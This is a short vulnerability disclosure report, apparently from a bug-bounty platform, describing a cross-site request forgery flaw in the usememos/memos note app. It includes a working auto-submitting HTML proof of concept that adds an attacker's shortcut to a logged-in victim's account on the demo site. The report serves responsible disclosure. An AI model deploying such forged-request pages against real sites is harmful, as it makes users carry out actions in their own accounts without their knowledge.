CSRF to add shortcuts to victim account in usememos/memos
Reported on
Dec 28th 2022
Description
Cross-Site Request Forgery (CSRF) is an attack that forces authenticated users to submit a request to a Web application against which they are currently authenticated. CSRF attacks exploit the trust a Web application has in an authenticated user
Proof of Concept
1) Go to https://demo.usememos.com and login into your account
2) Save the below CSRF POC as CSRF.html and open the file in the same browser
3) You will see that the attackers shortcut has been added to victim account
POC video: https://drive.google.com/file/d/1VzPaJ8WIdtncTiy9_HbWKfpy2aXq_xCs/view?usp=sharing
CSRF POC:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://demo.usememos.com/api/shortcut" method="POST" enctype="text/plain">
<input type="hidden" name="{"title":"hacked","payload":"[]"}" value="" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
# Impact
A CSRF vulnerability can allow an attacker to force the change of a password and/or other personal information
Occurrences
SECURITY.md
exists
a year ago